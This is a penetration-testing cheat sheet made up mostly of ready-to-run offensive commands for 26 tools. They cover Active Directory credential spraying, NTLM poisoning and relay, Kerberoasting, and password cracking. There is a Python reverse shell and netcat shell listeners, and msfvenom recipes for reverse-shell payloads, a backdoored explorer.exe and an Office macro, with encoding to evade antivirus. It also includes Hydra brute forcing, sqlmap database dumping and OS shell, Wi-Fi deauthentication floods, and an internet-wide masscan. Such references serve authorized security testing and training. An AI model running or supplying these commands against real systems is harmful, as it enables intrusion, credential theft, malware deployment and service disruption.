Reference List
    1. CrackMapExec
    2. Responder
    3. ntlmrelayx
    4. GPP-Decrypt
    5. GetUserSPNs
    6. HashCat64
    7. HashCat
    8. NetCat
    9. Veil-Framework
    10. Mentalist
    11. CUPP
    12. Skipfish
    13. Grabber
    14. Httrack
    15. Wafw00f
    16. Hydra
    17. pw-Inspector
    18. MACof
    19. Sublist3r
    20. Nessus
    21. XSSer
    22. SQLmap
    23. DirBuster
    24. MDK3
    25. Sherlock
    26. MasScan

CrackMapExec is a post-exploitation tool that helps automate security assessments of large Active Directory networks. It automates login attempts across multiple computers in the network [Link].

sudo apt-get install crackmapexec -y

If you already have credentials:

crackmapexec smb 10.0.0.0/24 -u Administrator -p 'Pa$$w0rd1!' -d WORKGROUP

If you only have the hash:

crackmapexec smb 10.0.0.0/24 -u Administrator -H asd3b4...89c0

Replace asd3b4…89c0 with the full hash you obtained.


Responder exploits SMB vulnerabilities [Link] (deprecated version also at [Link]).

locate Responder.py
cd /usr/share/responder/
python Responder.py -I eth0 -rdw -v

ntlmrelayx relays a received NTLM hash to a target IP listed in target.txt, gaining access to SMB shares using someone else’s credentials.

locate ntlmrelayx.py
cd /opt/impacket/examples
python ntlmrelayx.py -tf target.txt -smb2support

GPP-Decrypt decrypts GPP passwords.

gpp-decrypt edBS...lVmQ

Replace edBS…lVmQ with the encrypted GPP password string.


GetUserSPNs is part of a Kerberoast attack. It finds Service Principal Names associated with normal user accounts, which can then be used for an offline brute-force attack against the SPN account’s NTLM hash if valid TGS tickets can be obtained [Link].

python GetUserSPNs.py Domain/User -dc-ip 10.0.0.1 -request

Password: *******

HashCat64 is a powerful brute-force hash cracker, useful for cracking hashes obtained from GetUserSPNs or other sources [Link].

hashcat64.exe --help
hashcat64.exe -m 13100 kerberoast.txt rockyou.txt

HashCat is a password cracker [Link].

sudo apt install hashcat
hashcat -m 5600 hash.txt rockyou.txt
hashcat -m 5600 hash.txt rockyou.txt --force
hashcat -I
hashcat -d 1,2 -m 2500 -w 3 --status -a 6 wpa2_handshake.hccapx wordlist.txt
hashcat jwt.txt -m 16500 -a 0 rockyou.txt -r OneRuleToRuleThemAll.rule

Note that the hash captured with Responder was copied to hash.txt and mode 5600 is for NetNTLMv2. Use –help to find the module that matches your hash type. The password list used here is rockyou.txt, but another popular option is BreachParse.

The fourth line lists available CPUs and GPUs using -I, then specifies computing devices 1 and 2, sets module 2500 for WPA/WPA2, performance level 3 (1-4), and additional parameters.

Get OneRuleToRuleThemAll from [Link].


NetCat is a tool for creating network-based functionality such as chat, file transfer, remote shell, port scanning, and more [Link].

Server Side (Listener):

nc -nvlp 8080
nc -n -v -l -p 5555 -e /bin/bash
nc -n -v -l -p 5555 -e cmd.exe
nc -l -p 1234 > receive.file

Client Side:

nc -nv 10.0.0.1 5555
nc -zv domain.com 80-88
nc -w 3 10.0.0.1 1234 < send.file

It can also be accessed via other tools:

wget --post-file=file.txt 10.0.0.1 8080
/bin/bash -c '(while ! nc -z -v -w1 localhost 22 2>/dev/null; do echo "Waiting for port 22 to open ..."; sleep 2; done); sleep 2'

Getting a reverse shell with Python:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",53));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

Veil-Framework is a tool designed to generate Metasploit payloads that bypass common anti-virus solutions [Link].

git clone https://github.com/Veil-Framework/Veil.git
cd Veil/
./config/setup.sh --force --silent

msfVenom is a framework for creating and encrypting payloads. Note on EXITFUNC values: thread (clean exit), process (restarts on exit), seh (restarts the process on error).

msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 EXITFUNC=thread -f c -a x86 -b "\x00"

The first example creates a payload with file type 'c', architecture 32-bit, and excludes the bad character '\x00'. Since no output file is specified, the shellcode is printed to the screen for copying.

msfvenom -p windows/x64/meterpreter/reverse_http EXITFUNC=thread LPORT=4444 LHOST=10.0.0.1 -f raw -o payload.bin --smallest

The second example sets the format to 'raw', outputs to 'payload.bin', and attempts to generate the smallest shellcode possible.

msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3 -f python -n 26

The third example creates a payload with 3 iterations of the 'shikata_ga_nai' encoder, no null bytes, output in 'python' format, and 26 NOPs prepended.

msfvenom -a x86 --platform windows -x explorer.exe -k -p windows/shell/bind_tcp lhost=10.0.0.1 -b "\x00" -f exe -o explorer_backdoor.exe

The fourth example takes an existing 'explorer.exe' and uses '-k' to run the payload in a separate thread, outputting 'explorer_backdoor.exe' with the appended payload.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=eth0 LPORT=4444 -f exe > shell.exe

The fifth example creates a Meterpreter reverse shell as an exe, letting msfvenom automatically resolve the IP of interface eth0.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=eth0 LPORT=53 -f vba -o macro.vba

The last example creates a macro for use with Microsoft Office tools.


Mentalist creates password lists using rule sets and can also import existing lists such as CUPP's output [Link].

mentalist

CUPP (Common User Passwords Profiler) generates a list of possible passwords based on information about the target and their associates, such as first names, last names, nicknames, and birthdates [Link].

sudo python cupp.py -i

Skipfish is a website spider/crawler that also tests for various vulnerable parameters and configurations.

skipfish -YO -o ~/Desktop/folder http://192.168.x.x

Grabber is a spider/crawler that tests for SQLi (SQL Injection) and XSS (Cross-Site Scripting).

grabber --spider 1 --sql --xss --url http://example.com

Httrack recursively downloads a website, creating a local mirror.

httrack http://example.com -O ~/Desktop/file

Note: the same can be done with wget. The default depth is 5; the example below sets it to 10:

wget -r -l 10 http://example.com

Wafw00f detects the presence of a Web Application Firewall.

wafw00f http://example.com

Hydra is a brute-force login cracker supporting numerous protocols: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC, and XMPP [Link].

hydra -l userName -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 5 10.0.0.1 ssh
hydra -L users.lst -P /usr/share/wordlists/rockyou.txt ftp://10.0.0.1
hydra -L usernames.txt -P passwords.txt 10.0.0.1 http-post-form '/login.php:username=^USER^&password=^PASS^:F=incorrect' -v

The first example attempts to guess the password for userName using Metasploit's unix_passwords.txt list with 5 threads over SSH.

The second example attempts to log in to an FTP server using a list of usernames and the rockyou wordlist.

The third example targets an HTTP POST login form, supplying username and password lists and marking failed attempts by the word "incorrect" in the response.


pw-Inspector filters a wordlist by password length criteria (from 6 to 10 characters in the example below).

pw-inspector -i whole_wordlist.txt -o filtered_list.txt -m 6 -M 10

MACof floods a switch with random MAC addresses.

macof
macof -n 100
macof -i eth0 -d 192.168.1.1 -y 80

Sublist3r is a tool designed to passively enumerate subdomains of websites using OSINT [Link].

sublist3r -d example.com -t 5 -e bing

Nessus is a powerful professional vulnerability scanner [Link].

sudo systemctl start nessusd.service
https://localhost:8834/

XSSer is an automated framework for detecting, exploiting, and reporting XSS vulnerabilities in web applications.

sudo apt install xsser
xsser --gtk

xsser --url "http://127.0.0.1/login.php" -p "user=XSS&password=secret"
xsser --url "http://127.0.0.1/login.php" -p "user=XSS&password=secret" --auto
xsser --url "http://127.0.0.1/login.php" -p "user=XSS&password=secret" -Fp ""
xsser --url "http://127.0.0.1/login.php?user=XSS&password=secret"
xsser --url "http://127.0.0.1/login.php?user=XSS&password=secret" -Fp ""

Replace the value of the target parameter with XSS to tell XSSer where to inject payloads.


SQLmap automates the detection and exploitation of SQL injection flaws and can take over database servers [Link].

sudo apt install sqlmap
python sqlmap.py --help
sqlmap -u "https://example.com/search.php?q="
sqlmap -u "https://example.com/search.php?q=" --level=5 --risk=3
sqlmap -u "https://example.com/search.php?q=" --dbs --all --threads=10
sqlmap --url="https://example.com/login.php" --data="user=test&password=test"
sqlmap -u "https://example.com/search.php?q=" --batch --banner
sqlmap -u "https://example.com/search.php?q=" --batch --passwords
sqlmap -u "https://example.com/search.php?q=" --batch --dbs
sqlmap -u "https://example.com/search.php?q=" --batch --tables -D dbName
sqlmap -u "https://example.com/search.php?q=" --batch --dump -T tableName -D dbName
sqlmap -u "https://example.com/search.php?q=" --batch --os-shell

Note the level (1-5) and risk (1-3) settings for test intensity, dbs for listing database names, all for retrieving everything, and threads (1-10) for faster execution. The data argument provides POST variables.


DirBuster is designed to brute-force directory and file names on web/application servers.

dirb https://example.com/
dirb https://example.com/ wordslist.txt

OR

# also available with GUI

MDK3 exploits common Wi-Fi weaknesses, including brute-forcing hidden SSIDs, beacon flooding, authentication DoS, deauthentication, WPA downgrade, continuous traffic cancellation, stress testing, and more.

sudo apt install mdk3
sudo mdk3 wlan0mon a
sudo mdk3 wlan0mon d -c 6 -b mac_list.txt
sudo mdk3 wlan0mon p -t 00:00:00:00:00:00 -f ssid_list.txt

Note: the third line floods channel 6 with deauthentication messages using mac_list.txt. On the fourth line, replace 00:00:00:00:00:00 with the MAC address of the access point hosting the hidden SSID, and ssid_list.txt with the wordlist for brute-forcing.


Sherlock is an OSINT tool that searches for social media accounts matching a given username [Link].

sudo apt install sherlock
sherlock --timeout 1 username

MasScan is a mass scanner powerful enough to scan the entire Internet. Use it carefully as scanning unauthorized networks is illegal [Link].

masscan 0.0.0.0/0 --port 12345 --rate 1000000 -oX output.txt --exclude private_networks.txt

The output.txt file will be in XML format. The exclude argument prevents scanning non-public network ranges. See private_networks.txt below:

10.0.0.0/8
172.16.0.0/12
192.168.0.0/16